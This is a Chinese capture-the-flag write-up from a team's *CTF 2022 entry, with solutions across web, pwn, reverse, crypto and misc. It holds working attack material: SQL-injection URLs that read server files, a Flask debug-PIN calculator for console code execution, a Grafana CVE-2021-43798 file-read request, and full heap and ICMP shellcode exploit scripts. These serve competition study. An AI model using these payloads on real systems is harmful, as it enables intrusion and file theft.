*CTF2021 Writeup by or4nge
rank: 11th
or4nge 的师傅们在第七届 XCTF 国际网络攻防联赛 *CTF2022 分站赛中奋战 48 小时,拿到了 11 名的好成绩,师傅们真棒!
Web
oh-my-notepro
debug 模式为开,随便试一试即可触发报错,note_id 处存在注入,使用 load data local infile 'xx' into table xx 可以读文件。
创建临时表:
1http://123.60.72.85:5002/view?note_id=' union select 1,2,3,4,5;create table otable(data varchar(10000));--+
把文件写入表中:
1http://123.60.72.85:5002/view?note_id=' union select 1,2,3,4,5;load data local infile "/app/app.py" into table otable;--+
读取数据:
1http://123.60.72.85:5002/view?note_id=' union select 1,2,3,(select group_concat(data, '\n') from (select data from otable limit 0,50)x),5;--+
debug模式为开,考虑计算flask debug pin,exp如下:
1import hashlib
2from itertools import chain
3def get_machine_id():
4 machine_id = '1cc402dd0e11d5ae18db04a6de87223d' # /etc/machine-id
5 boot_id = '' # /proc/sys/kernel/random/boot_id
6 cgroup = '4b13f9ab9776ea7cf70e6ab9b3a06f5987e0d7b73fe5703ecf8e1d06018ebc71' # /proc/1/cgroup
7 linux = machine_id + boot_id + cgroup
8 return linux
9rv = None
10num = None
11mac = '02:42:ac:1c:00:03'# /sys/class/net/eth0/address
12
13probably_public_bits = [
14 'ctf',# username
15 'flask.app',# modname
16 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
17 '/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
18]
19private_bits = [
20 str(int(mac.replace(':',''), 16)),
21 get_machine_id()
22]
23h = hashlib.sha1()
24for bit in chain(probably_public_bits, private_bits):
25 if not bit:
26 continue
27 if isinstance(bit, str):
28 bit = bit.encode("utf-8")
29 h.update(bit)
30h.update(b"cookiesalt")
31cookie_name = f"__wzd{h.hexdigest()[:20]}"
32# If we need to generate a pin we salt it a bit more so that we don't
33# end up with the same value and generate out 9 digits
34if num is None:
35 h.update(b"pinsalt")
36 num = f"{int(h.hexdigest(), 16):09d}"[:9]
37# Format the pincode in groups of digits for easier remembering if
38# we don't have a result yet.
39if rv is None:
40 for group_size in 5, 4, 3:
41 if len(num) % group_size == 0:
42 rv = "-".join(
43 num[x : x + group_size].rjust(group_size, "0")
44 for x in range(0, len(num), group_size)
45 )
46 break
47 else:
48 rv = num
49print(rv)
算出pin,访问/console即可rce。
oh-my-lotto
将环境变量PATH设置为空即可跳过wget命令。第一次正常访问/lotto,然后访问/result获取结果,然后上传至/forecast,然后再次访问/lotto,提供环境变量PATH为空,即可使forecast与result相同,获得flag。
oh-my-grafana
cve-2021-43798任意文件读:GET /public/plugins/welcome/../../../../../../../../etc/passwd HTTP/1.1
读到了配置文件:/public/plugins/welcome/../../../../../../../..//etc/grafana/grafana.ini
发现唯一生效的配置文件就是 adminpassword
admin_user = admin
admin_password = 5f989714e132c9b04d4807dafeb10ade
看上去是个md5,但是实际上就是密码(在非隔离环境下需要多登录几次)
登进去后有个mysql服务,可以任意查询语句,趁着一堆人直接上车 select * from fffffflllllllllaaaagggggg
Pwn
examination
leak,任意地址添加 1 更改 len,堆溢出
1from pwn import *
2import sys
3context(os='linux', arch='amd64', log_level='debug')
4
5p = process("./examination")
6# p = remote("124.70.130.92", 60001)
7libc = ELF("./libc-2.31.so")
8
9def debugf(b=0):
10 if debug:
11 if b:
12 gdb.attach(p,"b *$rebase({b})".format(b = hex(b)))
13 else:
14 gdb.attach(p)
15
16elf = ELF('./examination')
17
18ru = lambda x : p.recvuntil(x)
19sn = lambda x : p.send(x)
20rl = lambda : p.recvline()
21sl = lambda x : p.sendline(x)
22rv = lambda x : p.recv(x)
23sa = lambda a,b : p.sendafter(a,b)
24sla = lambda a,b : p.sendlineafter(a, b)
25
26heap_base = 0
27
28def menu(i):
29 sla(b"choice>> ", str(i))
30
31def add_student(q):
32 menu(1)
33 sla(b"questions:", str(q))
34
35def give_score():
36 menu(2)
37
38def write_view(i, size, content, flag):
39 menu(3)
40 sla("which one? >", str(i))
41 if flag != 1:
42 sla("please input the size of comment: ", str(size))
43 sa("enter your comment:", content)
44
45def free(i):
46 menu(4)
47 sla("choose?", str(i))
48
49def change_role(i):
50 menu(5)
51 sla("role: <0.teacher/1.student>:", str(i))
52
53def pray():
54 menu(3)
55
56def check_view():
57 menu(2)
58
59def reward():
60 menu(2)
61 ru("reward! ")
62 base = ru(b"\n")[:-1]
63 global heap_base
64 heap_base = int(base, 16) - 0x2a0
65 print(hex(heap_base))
66 sla("addr: ", str(heap_base+0x2e0+1).encode() + b"\x00")
67
68def set_mode(i):
69 menu(4)
70 sla("100", str(i))
71
72def change_id(i):
73 menu(6)
74 sla("id:", str(i))
75
76sl("0")
77add_student(1)
78change_role(1)
79pray()
80change_role(0)
81give_score()
82
83write_view(0, 0x18, b"a"*0x10, 0)
84change_role(1)
85reward()
86change_role(0)
87add_student(1)
88payload1 = b"a"*0x18+p64(0x31) + p64(heap_base + 0x340) + p64(0)*4 + p64(0x21) + p32(1) + p32(0x41) + p64(heap_base+0x10) + p64(0x2a0+0x120)
89write_view(0,0x118 ,payload1, 1)
90
91write_view(1, 0x118, p16(0x7)*0x10, 1)
92
93add_student(2)
94write_view(2,0x100, b"a"*0x20, 0)
95add_student(3)
96write_view(3,0x8, b"/bin/sh\x00", 0)
97free(2)
98
99change_role(1)
100change_id(1)
101menu(2)
102ru("review:")
103rv(0x3a1)
104libc.address = u64(p.recv(6).ljust(8, b"\x00")) - libc.sym["__malloc_hook"] - 0x10 - 96
105print(hex(libc.address))
106change_role(0)
107payload2 = b"a"*0x18+p64(0x31) + p64(heap_base + 0x340) + p64(0)*4 + p64(0x21) + p32(1) + p32(0x41) + p64(libc.sym["__free_hook"]) + p64(0x2a0+0x120)
108write_view(0,0x118, payload2, 1)
109write_view(1,0x118, p64(libc.sym["system"]), 1)
110
111gdb.attach(p)
112# free(3)
113p.interactive()
ping
1from scapy.all import *
2from pwn import *
3context.arch = 'i386'
4
5res = b''
6def pwn(num,idx):
7 global res
8 payload1 = asm(shellcraft.memcpy(0x10c2aa,0x350000+idx,1))
9 payload1 += asm('''
10 mov eax, 0x0010014b
11 jmp eax
12 ''')
13 payload =p8(num)+ b'\x90'*(484-1-len(payload1))+payload1
14 payload +=p32(0x10c280) + p32(0x0010c8ac)+p32(0x00000023)+p32(0x0010a6b4)+p32(0x0010a6b4)+p32(0x10c2aa+50)+p32(0x0010c8ac)+p32(0x00000212)+p32(0x0010c280)+p32(0x0010c878)+p32(0)+p32(0x00010000)+p32(0)+p32(0x00107974)+p32(0x00010000)+p32(0x2badb002)+p32(0)*5
15
16 b = IP(dst='20.239.70.121', len=596)/ICMP()/payload
17 b = IP(raw(b))
18 checksum_scapy = b[ICMP].chksum
19 b = IP(dst='20.239.70.121', len=596)/ICMP(chksum=checksum_scapy )/payload
20
21 ping = sr1(b, timeout=0.5)
22 if ping:
23 res+=p8(num)
24 print(res)
25 return num
26 return 0
27
28for idx in range(6,24):
29 for num in range(0x21,0x7f):
30 print(num,idx)
31 if pwn(num,idx):
32 break
33
34print(res)
Re
Simple File System
输入plantflag可以植入flag文件的某种翻译方式到某个块里
把所有可打印字符放进flag文件,就可以得到翻译的字典
在image.flag文件里找*CTF翻译后的前缀,就有整个flag了
Jump
在sub_402689运行了 sub_4119F0(qword_4C9400, (__int64)"%c%s%c", 2LL, (const char *)dword_4C9620, 3LL); 后下硬件断点,发现生成了以所有位置为起始的字符串。
随后这些字符串传入 sub_401F62,进行快排。
最后在 sub_402826 中以排序后的所有字符串的最后一位构成密文,并与目标比较
因此可以得知target中每个字符的后一个字符是顺序排列的
1target = '\x03jmGn_=uaSZLvN4wFxE6R+p\x02D2qV1CBTck'
2sorttar = list(target)
3sorttar.sort()
4flag = ['\x03']
5
6for _ in range(0x21):
7 c = flag[0]
8 flag = [target[sorttar.index(c)]] + flag
9print (''.join(flag[1:-1]))
NaCl
一个 feistal 结构的8字节分组密码,一个 xtea 密码
整体循环分为 4 次,每次处理 8 字节
先进行密钥扩展,这一步每次都要进,但仅第一次执行
随后进行 feistal 的加密,加密之后进行 xtea 加密,xtea的循环次数取决于大循环的次数
解密脚本
1from libnum import *
2
3def xtea_decrypt(v, i):
4 '''v: list'''
5 key = [0x3020100, 0x7060504, 0xB0A0908, 0xF0E0D0C]
6 v0, v1 = v
7 delta = 0x10325476
8 sum=(delta * (1 << i)) & 0xffffffff
9 for _ in range(1 << i):
10 v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3])
11 v1 &= 0xffffffff
12 sum -= delta
13 sum &= 0xffffffff
14 v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3])
15 v0 &= 0xffffffff
16 return [v0, v1]
17
18def rol(x, i):
19 return ((x << i) | (x >> (32 - i))) & 0xffffffff
20
21key = [
22 0x4050607, 0x10203, 0x0C0D0E0F, 0x8090A0B, 0x0CD3FE81B, 0x0D7C45477, 0x9F3E9236, 0x107F187,
23 0x0F993CB81, 0x0BF74166C, 0x0DA198427, 0x1A05ABFF, 0x9307E5E4, 0x0CB8B0E45, 0x306DF7F5, 0x0AD300197,
24 0x0AA86B056, 0x449263BA, 0x3FA4401B, 0x1E41F917, 0x0C6CB1E7D, 0x18EB0D7A, 0x0D4EC4800, 0x0B486F92B,
25 0x8737F9F3, 0x765E3D25, 0x0DB3D3537, 0x0EE44552B, 0x11D0C94C, 0x9B605BCB, 0x903B98B3, 0x24C2EEA3,
26 0x896E10A2, 0x2247F0C0, 0x0B84E5CAA, 0x8D2C04F0, 0x3BC7842C, 0x1A50D606, 0x49A1917C, 0x7E1CB50C,
27 0x0FC27B826, 0x5FDDDFBC, 0x0DE0FC404, 0xB2B30907
28]
29
30cipher = [
31 0xFDF5C266, 0x7A328286, 0xCE944004, 0x5DE08ADC,
32 0xA6E4BD0A, 0x16CAADDC, 0x13CD6F0C, 0x1A75D936,
33]
34
35for i in range(0, 4):
36 l, r = xtea_decrypt(cipher[2*i:2*i+2], i+1)
37 for j in range(44):
38 l, r = r, l
39 l ^= (rol(r, 1) & rol(r, 8)) ^ rol(r, 2) ^ key[43 - j]
40 l, r = r, l
41 print (n2s(l).decode() + n2s(r).decode(), end='')
Crypto
ezRSA
q的前124位能求出来,然后第300-900位可以通过移比特确定(看下面代码,思路跟zer0pts那个anti很像),最后300位直接copper
不知道为啥,本地测试了一下,下面这个脚本只能爆出450-900位的,第300-450有点小问题,但是总共只有450bit不确定,还是能直接copper,直接就出了
1from Crypto.Util.number import long_to_bytes
2import gmpy2
3
4n = 0xe78ab40c343d4985c1de167e80ba2657c7ee8c2e26d88e0026b68fe400224a3bd7e2a7103c3b01ea4d171f5cf68c8f00a64304630e07341cde0bc74ef5c88dcbb9822765df53182e3f57153b5f93ff857d496c6561c3ddbe0ce6ff64ba11d4edfc18a0350c3d0e1f8bd11b3560a111d3a3178ed4a28579c4f1e0dc17cb02c3ac38a66a230ba9a2f741f9168641c8ce28a3a8c33d523553864f014752a04737e555213f253a72f158893f80e631de2f55d1d0b2b654fc7fa4d5b3d95617e8253573967de68f6178f78bb7c4788a3a1e9778cbfc7c7fa8beffe24276b9ad85b11eed01b872b74cdc44959059c67c18b0b7a1d57512319a5e84a9a0735fa536f1b3
5c = 0xd7f6c90512bc9494370c3955ff3136bb245a6d1095e43d8636f66f11db525f2063b14b2a4363a96e6eb1bea1e9b2cc62b0cae7659f18f2b8e41fca557281a1e859e8e6b35bd114655b6bf5e454753653309a794fa52ff2e79433ca4bbeb1ab9a78ec49f49ebee2636abd9dd9b80306ae1b87a86c8012211bda88e6e14c58805feb6721a01481d1a7031eb3333375a81858ff3b58d8837c188ffcb982a631e1a7a603b947a6984bd78516c71cfc737aaba479688d56df2c0952deaf496a4eb3f603a46a90efbe9e82a6aef8cfb23e5fcb938c9049b227b7f15c878bd99b61b6c56db7dfff43cd457429d5dcdb5fe314f1cdf317d0c5202bad6a9770076e9b25b1
6
7hight_124 = int(bin(gmpy2.iroot(n, 2)[0])[2:][:124], 2)
8p = ((hight_124 << 900) ^ (1<<900)-1) ^ ((1<<300)-1)
9q = (hight_124 << 900)
10for i in range(898, 299, -1):
11 cur = 1<<i
12 if (p^cur) * (q^cur) < n:
13 p ^= cur
14 q ^= cur
15
16print(p >> 450)
17#Sage
18from sage.all import *
19n = 0xe78ab40c343d4985c1de167e80ba2657c7ee8c2e26d88e0026b68fe400224a3bd7e2a7103c3b01ea4d171f5cf68c8f00a64304630e07341cde0bc74ef5c88dcbb9822765df53182e3f57153b5f93ff857d496c6561c3ddbe0ce6ff64ba11d4edfc18a0350c3d0e1f8bd11b3560a111d3a3178ed4a28579c4f1e0dc17cb02c3ac38a66a230ba9a2f741f9168641c8ce28a3a8c33d523553864f014752a04737e555213f253a72f158893f80e631de2f55d1d0b2b654fc7fa4d5b3d95617e8253573967de68f6178f78bb7c4788a3a1e9778cbfc7c7fa8beffe24276b9ad85b11eed01b872b74cdc44959059c67c18b0b7a1d57512319a5e84a9a0735fa536f1b3
20
21p4 = 58804727289972133098258523381187273579708165828871631637667339400276723145699294300854967408059394786721660574269169740095474486979958553835424583960343801193657276948482959
22
23e = 65537
24pbits = 1024
25kbits = pbits - p4.nbits()
26print(p4.nbits())
27p4 = p4 << kbits
28PR.<x> = PolynomialRing(Zmod(n))
29f = x + p4
30roots = f.small_roots(X=2^kbits, beta=0.4)
31#经过以上一些函数处理后,n和p已经被转化为10进制
32if roots:
33 p = p4+int(roots[0])
34 print("n: "+str(n))
35 print("p: "+str(p))
36 print("q: "+str(n//p))
Patches2
1from pwn import *
2import hashlib
3C0 = 'C0'
4C1 = 'C1'
5C2 = 'C2'
6C3 = 'C3'
7C4 = 'C4'
8C5 = 'C5'
9C6 = 'C6'
10
11def GFDiv(x, z):
12 mod = 0
13 while x.bit_length() >= z.bit_length():
14 bitLack = x.bit_length() - z.bit_length()
15 x = x ^ (z << bitLack)
16 mod = mod ^ (1 << bitLack)
17 return mod, x
18
19def GFMul(x, z):
20 i = 0
21 res = 0
22 while z != 0:
23 if z & 1:
24 res = res ^ (x << i)
25 i += 1
26 z = (z >> 1)
27 return res
28
29def xor(a, b):
30 xor = '( ( %(a)s ) and ( ( %(b)s ) == 0 ) ) or ( ( %(b)s ) and ( ( %(a)s ) == 0 ) )'
31 s = xor % {'a': a, 'b': b}
32 return s
33
34def xor3(a, b, c):
35 temp = xor(a, b)
36 return xor(temp, c)
37
38def xor4(a, b, c, d):
39 temp = xor(a, b)
40 temp2 = xor(c, d)
41 return xor(temp, temp2)
42
43def f(n):
44 if n == 1:
45 return 0
46 else:
47 return 1
48
49
50BCHcode = ["" for i in range(15)]
51BCHcode[0] = C0
52BCHcode[1] = C1
53BCHcode[2] = C2
54BCHcode[3] = C3
55BCHcode[4] = xor(C0, C4)
56BCHcode[5] = xor(C1, C5)
57BCHcode[6] = xor3(C0, C2, C6)
58BCHcode[7] = xor3(C0, C1, C3)
59BCHcode[8] = xor4(C0, C1, C2, C4)
60BCHcode[9] = xor4(C1, C2, C3, C5)
61BCHcode[10] = xor4(C2, C3, C4, C6)
62BCHcode[11] = xor3(C3, C4, C5)
63BCHcode[12] = xor3(C4, C5, C6)
64BCHcode[13] = xor(C5, C6)
65BCHcode[14] = C6
66
67context(os="linux",log_level='debug')
68p=remote("124.71.145.24",60002)
69p.recvuntil("sha256(xxxx+")
70leave=p.recv(16).decode()
71print(leave)
72p.recvuntil("== ")
73sha256=p.recv(64).decode()
74print(sha256)
75pd=0
76for i in range(32,127):
77 for j in range(32,127):
78 for k in range(32,127):
79 for m in range(32,127):
80 strings = chr(i) + chr(j) + chr(k) + chr(m) + leave
81 s = hashlib.sha256()
82 s.update(strings.encode())
83 b = s.hexdigest()
84 if b == sha256:
85 key=chr(i) + chr(j) + chr(k) + chr(m)
86 print(key)
87 pd=1
88 break
89 if pd==1:
90 break
91 if pd==1:
92 break
93 if pd==1:
94 break
95p.send(key)
96for la in range(50):
97
98 bits = [0]*15
99 res=0
100 res2=0
101 for i in range(15):
102 p.sendlineafter("Ask Patches:",BCHcode[i])
103 p.recvuntil("Patches answers: ")
104 recvbool=p.recv(1)
105 if recvbool==b'T':
106 bits[i]=1
107 print(bits)
108 for i in range(15):
109 if bits[i]==1:
110 res^=1<<i
111 res2^=1<<(3*i)
112 pd = 0
113 for i in range(16):
114 for j in range(16):
115 if i != 15:
116 bits[i] = f(bits[i])
117 if j != 15:
118 bits[j] = f(bits[j])
119 res = 0
120 res2 = 0
121 for k in range(15):
122 if bits[k] == 1:
123 res ^= 1 << k
124 res2 ^= 1 << (3 * k)
125 _, mod = GFDiv(res, 19)
126 _, mod2 = GFDiv(res2, 4681)
127 if mod == 0 and mod2 == 0:
128 pd = 1
129 break
130 else:
131 if i != 15:
132 bits[i] = f(bits[i])
133 if j != 15:
134 bits[j] = f(bits[j])
135 if pd == 1:
136 break
137 res = 0
138 for i in range(15):
139 if bits[i] == 1:
140 res ^= 1 << i
141 C, _ = GFDiv(res, 465)
142 print(bin(C))
143 pay = ""
144 print(_)
145 for i in range(7):
146 pay += str(C % 2) + " "
147 C //= 2
148 pay=pay.strip()
149 p.sendlineafter("Now open the chests:",pay)
150p.interactive()
Misc
babyFL
联邦学习,我们能控制20个客户端,想办法用提交的参数数据污染掉服务端的训练过程让测试达到0.95精度即可
exp:
1import numpy as np
2from pwn import *
3# context(log_level='debug')
4p = remote('124.70.158.154', 8081)
5def get_val(arr):
6 if len(arr.shape) > 1:
7 for temp in arr:
8 get_val(temp)
9 else:
10 l = len(arr)
11 for i in range(l):
12 arr[i] = float(input())
13res = np.load('./save/final.npy', allow_pickle=True)
14# for i in range(8):
15# mtx = res[i][0] * 1000
16# try:
17# for j in mtx:
18idx = 0
19mtx = res[0][0] * 1000
20for i in mtx:
21 for j in i:
22 for k in j:
23 for l in k:
24 p.sendline(str(l).encode())
25 idx += 1
26mtx = res[1][0] * 1000
27for i in mtx:
28 p.sendline(str(i).encode())
29 idx += 1
30mtx = res[2][0] * 1000
31for i in mtx:
32 for j in i:
33 for k in j:
34 for l in k:
35 p.sendline(str(l).encode())
36 idx += 1
37mtx = res[3][0] * 1000
38for i in mtx:
39 p.sendline(str(i).encode())
40 idx += 1
41mtx = res[4][0] * 1000
42for i in mtx:
43 for j in i:
44 p.sendline(str(j).encode())
45 idx += 1
46mtx = res[5][0] * 1000
47for i in mtx:
48 p.sendline(str(i).encode())
49 idx += 1
50mtx = res[6][0] * 1000
51for i in mtx:
52 for j in i:
53 p.sendline(str(j).encode())
54 idx += 1
55
56mtx = res[7][0] * 1000
57for i in mtx:
58 p.sendline(str(i).encode())
59 idx += 1
60print(idx)
训练脚本:
1import os
2import traceback
3import numpy as np
4from tensorflow.keras import Sequential
5from tensorflow.keras.layers import Dense, Conv2D, Flatten, MaxPooling2D
6from tensorflow import keras
7from tensorflow.keras.models import load_model
8from tensorflow.keras.datasets import mnist
9participant_number = 20
10
11def new_model():
12 model = Sequential()
13 model.add(Conv2D(10, (3, 3), input_shape=(28, 28, 1)))
14 model.add(MaxPooling2D(pool_size=(2, 2)))
15 model.add(Conv2D(20, (3, 3)))
16 model.add(Flatten())
17 model.add(Dense(units=100, activation='relu'))
18 model.add(Dense(units=10, activation='softmax'))
19 model.compile(loss=keras.losses.SparseCategoricalCrossentropy(), metrics=['accuracy'],
20 optimizer=keras.optimizers.Adam(lr=0.001))
21 return model
22
23def load_test_data():
24 (_, _), (x, y) = mnist.load_data()
25 l = len(y)
26 for i in range(l):
27 y[i] = 9 - y[i]
28 x = x.reshape(-1, 28, 28, 1)
29 return x, y
30
31def train_models():
32 (x, y), (_, _) = mnist.load_data()
33 x = x.reshape(-1, 28, 28, 1)
34 for i in range(participant_number):
35 model = new_model()
36 model.fit(x, y, batch_size=64, epochs=10)
37 model.save("./model/"+str(i))
38
39def aggregation(parameters):
40 print('aggregation')
41 weights = []
42 for layer in parameters:
43 sum = 0
44 l = len(layer)
45 for temp in layer:
46 sum = sum + temp
47 weights.append(sum / l)
48 # weights.append(layer[2])
49 model = new_model()
50 l = len(model.get_weights())
51 model.set_weights(weights)
52 return model
53
54def test(model):
55 print('test')
56 my_x, my_y = load_test_data()
57 loss, acc = model.evaluate(my_x, my_y, batch_size=64)
58 print(loss, acc)
59 if acc > 0.95:
60 f = open('./flag')
61 print(f.read())
62 else:
63 print("you fail", acc)
64
65def load_parameters():
66 print('load parameter')
67 parameters = []
68 models = []
69 for i in range(participant_number):
70 models.append(load_model("./inv_model/"+str(i)))
71 for i in range(8):
72 layer = []
73 for j in range(participant_number):
74 temp = models[j].get_weights()
75 layer.append(temp[i])
76 parameters.append(layer)
77 return parameters
78def load_parameters1():
79 print('load parameter1')
80 parameters = []
81 models = []
82 for i in range(participant_number):
83 models.append(load_model("./model/"+str(i)))
84 for i in range(8):
85 layer = []
86 for j in range(participant_number):
87 temp = models[j].get_weights()
88 layer.append(temp[i])
89 parameters.append(layer)
90 return parameters
91def get_val(arr):
92 if len(arr.shape) > 1:
93 for temp in arr:
94 get_val(temp)
95 else:
96 l = len(arr)
97 for i in range(l):
98 arr[i] = float(input())
99
100def get_input_parameter(parameters):
101 print('get input parameter')
102 res = np.load('./save/final.npy', allow_pickle=True)
103 i = 0
104 for layer in parameters:
105 input_weight = np.zeros(layer[0].shape)
106 print("next layer:")
107 # get_val(input_weight)
108 input_weight = res[i][0] * 1000
109 layer.append(input_weight)
110 i += 1
111 return parameters
112
113# 8 * 20 * (3 * 3 * 1 * 10)
114if __name__ == '__main__':
115 parameters1 = load_parameters1()
116 np.save('./save/final', parameters1)
117 # model1 = aggregation(parameters1)
118 # test(model1)
119 # parameters2 = load_parameters()
120 # np.save('./save/final2', parameters2)
121
122 # model2 = aggregation(parameters2)
123 # test(model2)
124
125 # print(len(parameters))
126 # print(parameters)
127 parameters = load_parameters()
128 # np.save('./save/final', parameters)
129 parameters = get_input_parameter(parameters)
130 model = aggregation(parameters)
131 test(model)
Today
根据题目信息推测出在上海,通过一家农夫生鲜水果店,找到对面的小区,在地图评论区找到flag
文章来源: http://mp.weixin.qq.com/s?__biz=MzkyNDIyNTE0OQ==&mid=2247484169&idx=6&sn=cae225e900f37939155484ed47312641&chksm=c1d8581bf6afd10db960262fcbc8948349d80b7c20ddbe4ad291b86c6b1e9123a77462dde107#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh